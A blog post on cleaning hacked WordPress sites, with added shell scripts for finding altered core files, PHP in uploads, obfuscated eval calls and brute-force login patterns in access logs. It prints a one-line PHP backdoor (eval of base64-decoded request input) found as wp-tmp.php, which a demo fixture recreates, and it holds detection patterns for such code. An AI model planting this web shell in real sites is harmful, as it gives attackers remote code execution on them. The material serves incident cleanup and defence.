In January, one of my websites was hacked. The symptom was that when I accessed the website, it only showed a white screen in the browser. I didn't pay much attention to that and just restored the whole website from an early backup. However, it was just the beginning of the nightmare. After one month, all my websites on the same shared hosting were hacked. Now it became a serious problem, and two of my websites were already marked as "Malware code injection". Then my journey of cleaning hacked WordPress websites began.
How to Clean Hacked WordPress Website
All the hacked websites are powered by WordPress. I think it will be very helpful if I share my experience of how to find the hacked files in a WordPress website. There are several steps to find the hack code and clean a hacked WordPress website.
Find Suspicious Files in WordPress Website
To clean a hacked WordPress website, step 1 is finding all suspicious files in the hacked site. If you are familiar with WordPress, it will be very easy to find suspicious files. If you are not familiar with WordPress, you can download the latest version of WordPress and then compare its files with your hacked website: any file that exists only on your site, or differs from the clean copy, deserves a look. In my website, I found a file named "wp-tmp.php" in the root folder. This is the most common way in which hackers hide their backdoor script.
Suspicious file wp-tmp.php in Hacked WordPress Website
The "wp-tmp.php" looks very similar to other WordPress files, such as "wp-login.php" and "wp-settings.php". However, "wp-tmp.php" is definitely a backdoor: hackers use this file to access your WordPress website and inject malware into it. The "wp-tmp.php" looks like this:
<?php $p = $_REQUEST["m"]; eval(base64_decode($p)); ?>
Backdoor in WordPress Uploads Folder
Step 2 to clean a hacked WordPress website is searching for harmful code in the uploads folder. The "wp-content/uploads" folder in WordPress is another place where hackers like to put their malware code. Because the uploads folder contains all the media files we upload to our website, we will not delete this folder when we clean the hacked website. So when you are cleaning a hacked WordPress site, you must search this folder to check whether there are any PHP files inside.
Clean a Hacked WordPress Site in 5 Minutes
Step 3 to clean a hacked WordPress site is deleting all hacked files. After finding all the suspicious files in the hacked WordPress website, simply deleting these files is not enough. Many hackers like to modify WordPress system files to inject harmful code inside, and this type of hacked file is very hard to find and clean. So the best way to clean your hacked WordPress website is to delete all the WordPress system files, keeping only a backup of the "wp-content" folder and the "wp-config.php" file from the root folder.
Restore Clean WordPress System Files
Step 4 is restoring the WordPress system files. This step is quite simple. I downloaded the latest WordPress source code from wordpress.org and copied all the WordPress files to my website. Please remember to upload your own "wp-content" folder and "wp-config.php" file, which you backed up in step 3.
Stop WordPress Cron Job
Step 5 is stopping the cron job in WordPress. Though this step may not be necessary, it is better for keeping your website safe. In my experience of cleaning hacked WordPress sites, some sophisticated hackers hide their injection code in the database and use the WordPress cron job to run this harmful code, then hack your WordPress website again.
To stop the cron job in WordPress, you can edit the "wp-config.php" file:
Another way to stop the cron job is to rename the "wp-cron.php" file or delete it. In my website, I took both of the above actions.
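The five steps above, as one triage script added here (not code from the original post). It assumes a clean WordPress download unpacked in a reference directory (REF) and the hacked site in another (SITE); the function names are mine. DISABLE_WP_CRON is the real WordPress constant for step 5, and the script inserts it before the "stop editing" marker in wp-config.php because a define placed after wp-settings.php is loaded comes too late. The make_demo function builds a small constructed tree, including the wp-tmp.php line quoted above, so the checks can be run offline.

```shell
#!/usr/bin/env bash
# Added example for steps 1-5 above, not code from the original post.
# REF = clean WordPress download, SITE = the hacked site. Function names are mine.
set -u

# Step 1: files outside wp-content that the clean copy does not have (EXTRA) or
# whose contents differ from it (MODIFIED). wp-config.php and .htaccess are
# site-specific, so they are skipped here and reviewed by hand.
find_core_changes() {   # usage: find_core_changes REF SITE
  local ref="$1" site="$2" f
  ( cd "$site" && find . -path ./wp-content -prune -o -type f -print ) | sort |
  while IFS= read -r f; do
    case "$f" in ./wp-config.php|./.htaccess) continue ;; esac
    if [ ! -f "$ref/$f" ]; then
      printf 'EXTRA %s\n' "$f"
    elif ! cmp -s "$ref/$f" "$site/$f"; then
      printf 'MODIFIED %s\n' "$f"
    fi
  done
}

# Step 2: media uploads never need PHP, so any PHP file under uploads is suspect.
find_php_in_uploads() {  # usage: find_php_in_uploads SITE
  find "$1/wp-content/uploads" -type f \
    \( -iname '*.php' -o -iname '*.phtml' -o -iname '*.php[0-9]' \) 2>/dev/null | sort
}

# Extra check for the wp-tmp.php pattern: eval() fed by a decoder function.
grep_obfuscation() {  # usage: grep_obfuscation SITE
  find "$1" -type f -name '*.php' -exec \
    grep -lE 'eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|str_rot13)' {} + 2>/dev/null | sort
}

# Step 3: keep only wp-content and wp-config.php before wiping the core files.
# Run find_php_in_uploads on DEST too, because the copy includes uploads.
backup_keep_set() {  # usage: backup_keep_set SITE DEST
  mkdir -p "$2" && cp -R "$1/wp-content" "$2/" && cp "$1/wp-config.php" "$2/"
}

# Step 5: define DISABLE_WP_CRON (a real WordPress constant) before the
# "stop editing" marker, i.e. before wp-settings.php is loaded, and rename
# wp-cron.php as the post suggests. Prints how many times the constant occurs.
disable_wp_cron() {  # usage: disable_wp_cron SITE
  local cfg="$1/wp-config.php" line="define('DISABLE_WP_CRON', true);"
  if ! grep -q 'DISABLE_WP_CRON' "$cfg"; then
    if grep -q 'stop editing' "$cfg"; then
      awk -v line="$line" '/stop editing/ && !done { print line; done = 1 } { print }' "$cfg" > "$cfg.tmp"
    else  # no marker: put the define right after the opening <?php line
      awk -v line="$line" 'NR == 1 { print; print line; next } { print }' "$cfg" > "$cfg.tmp"
    fi
    mv "$cfg.tmp" "$cfg"
  fi
  if [ -f "$1/wp-cron.php" ]; then mv "$1/wp-cron.php" "$1/wp-cron.php.disabled"; fi
  grep -c 'DISABLE_WP_CRON' "$cfg"
}

# Constructed demo tree standing in for a real download and a real site, so the
# functions can be exercised offline; prints the temporary root directory.
make_demo() {
  local root f; root=$(mktemp -d)
  mkdir -p "$root/ref/wp-includes" "$root/site/wp-includes" "$root/site/wp-content/uploads/2019/01"
  for f in wp-login.php wp-cron.php wp-includes/user.php; do
    printf '<?php // clean core file: %s\n' "$f" > "$root/ref/$f"
  done
  cp "$root/ref/wp-login.php" "$root/ref/wp-cron.php" "$root/site/"
  printf '<?php // clean core file: wp-includes/user.php\n// constructed: line that is not in the clean copy\n' \
    > "$root/site/wp-includes/user.php"
  # the backdoor line quoted in the post, placed where the post found it
  printf '<?php $p = $_REQUEST["m"]; eval(base64_decode($p)); ?>\n' > "$root/site/wp-tmp.php"
  printf '<?php echo 1; ?>\n' > "$root/site/wp-content/uploads/2019/01/shell.php"
  printf 'GIF89a\n' > "$root/site/wp-content/uploads/2019/01/photo.gif"
  printf "<?php\ndefine('DB_NAME', 'example');\n/* That's all, stop editing! Happy publishing. */\nrequire_once ABSPATH . 'wp-settings.php';\n" \
    > "$root/site/wp-config.php"
  echo "$root"
}

if [ "${1:-}" = "demo" ]; then   # usage: bash triage.sh demo
  root=$(make_demo)
  find_core_changes "$root/ref" "$root/site"; find_php_in_uploads "$root/site"
  grep_obfuscation "$root/site"; disable_wp_cron "$root/site"
fi
```

On a real site, point REF at the unpacked download of the same WordPress version as the site (the comparison is only meaningful version for version), and review the EXTRA and MODIFIED list before deleting anything: a modified core file such as wp-includes/user.php shows up there even when its name looks perfectly normal.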
Ask Google to Review Your Website
If your hacked website is already marked as a malware website by Google, you have to ask Google to review your website. First, you can register with Google Webmaster Tools. For more information, you can check this Google official document:
Prevent Your Website Being Hacked
After you clean the hacked WordPress site successfully, you should keep watching the website for at least 2 or 3 days. Hackers will try their best to hack your website again when they find they have lost control of it. Therefore, it is very important to check the raw access log of your website. If your website is hacked again, you will at least find where the hackers walked into your website. Then you just repeat the above steps and close the backdoor. So keep watching the access log until there is no more suspicious access. Here is my raw access log example. The website was hacked again after I cleaned my hacked WordPress website, so I deleted all the WordPress system files and stopped my cron job in WordPress.
Avoid Brute Force Login
A brute force attack is the most common way to hack a website to get the username and password. Lots of people use brute force attack web services to attack WordPress-powered websites and get the admin username and password. Here is how it looks in the access log:
To keep our website safe, we must take some actions to protect it. Here is an article about how to avoid brute force attacks on the login page.
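The two things the post reads out of the raw access log (the brute-force pattern on the login page, and requests that show where the hackers walked in, such as hits on wp-tmp.php), as an added example that is not part of the original post. The log lines in make_log are constructed in combined log format with documentation IP ranges, and the m=REDACTED query value is a placeholder; the function names are mine.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: reading a raw access log in
# combined log format for the two patterns the post describes.
# Fields: $1 client IP, $4 [timestamp, $6 "METHOD, $7 request path, $9 status.
set -u

# IPs that POSTed to wp-login.php at least MIN times: the brute-force pattern.
brute_force_ips() {  # usage: brute_force_ips LOG MIN
  awk -v min="$2" '$6 == "\"POST" && $7 ~ /^\/wp-login\.php/ { n[$1]++ }
    END { for (ip in n) if (n[ip] >= min) print ip, n[ip] }' "$1" | sort -k2,2nr
}

# Requests for the backdoor the post describes (wp-tmp.php) or for PHP under
# uploads; any hit here after cleaning means a door is still open.
backdoor_hits() {  # usage: backdoor_hits LOG
  awk '$7 ~ /^\/wp-tmp\.php/ || $7 ~ /^\/wp-content\/uploads\/.*\.php/ {
    print $1, substr($6, 2), $7, $9 }' "$1"
}

# Everything one client did, in order: how to see where that client walked in.
requests_from() {  # usage: requests_from LOG IP
  awk -v ip="$2" '$1 == ip { print substr($4, 2), substr($6, 2), $7, $9 }' "$1"
}

# Constructed sample log (documentation IP ranges, placeholder query value);
# prints the path of the temporary file it wrote.
make_log() {
  local f; f=$(mktemp)
  cat > "$f" <<'EOF'
203.0.113.7 - - [05/Feb/2019:03:14:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3872 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Feb/2019:03:14:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3872 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Feb/2019:03:14:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3872 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Feb/2019:03:14:04 +0000] "POST /wp-login.php HTTP/1.1" 200 3872 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Feb/2019:03:14:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3872 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Feb/2019:03:14:06 +0000] "POST /wp-login.php HTTP/1.1" 200 3872 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Feb/2019:08:02:10 +0000] "GET /wp-login.php HTTP/1.1" 200 4011 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Feb/2019:08:02:31 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Feb/2019:08:02:32 +0000] "GET /wp-admin/ HTTP/1.1" 200 23410 "-" "Mozilla/5.0"
198.51.100.23 - - [05/Feb/2019:11:40:44 +0000] "GET /wp-tmp.php?m=REDACTED HTTP/1.1" 200 12 "-" "python-requests/2.21.0"
198.51.100.23 - - [05/Feb/2019:11:40:45 +0000] "POST /wp-content/uploads/2019/01/shell.php HTTP/1.1" 200 54 "-" "python-requests/2.21.0"
EOF
  echo "$f"
}

if [ "${1:-}" = "demo" ]; then   # usage: bash accesslog.sh demo
  log=$(make_log)
  echo "== login POSTs, 5 or more =="; brute_force_ips "$log" 5
  echo "== backdoor hits =="; backdoor_hits "$log"
  echo "== timeline for 198.51.100.23 =="; requests_from "$log" 198.51.100.23
fi
```

A single POST to wp-login.php followed by a 302 is what a normal login looks like (192.0.2.10 above); a run of POSTs from one address that all return 200 is the login page being served again after each failed guess. Once the backdoor client is identified, requests_from shows every path it touched, which is the list of files to check in the next cleaning pass.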
Delete Unknown Account
What's the simplest back door in a hacked website? The answer is an administrator account. That's right. Please don't forget to check whether there are unusual accounts in your website. It is very simple to check: just go to your website backend and look at the account list. Delete all the accounts you don't need.
Change Your Administrator Password
When your website is compromised, your username and password may already have leaked. In my hacked WordPress website, the file "wp-includes/user.php" was injected with hacked code. I guess this injected hack code captures the plain username and password when we try to log in. Therefore, the last step to clean up your website is changing your administrator password.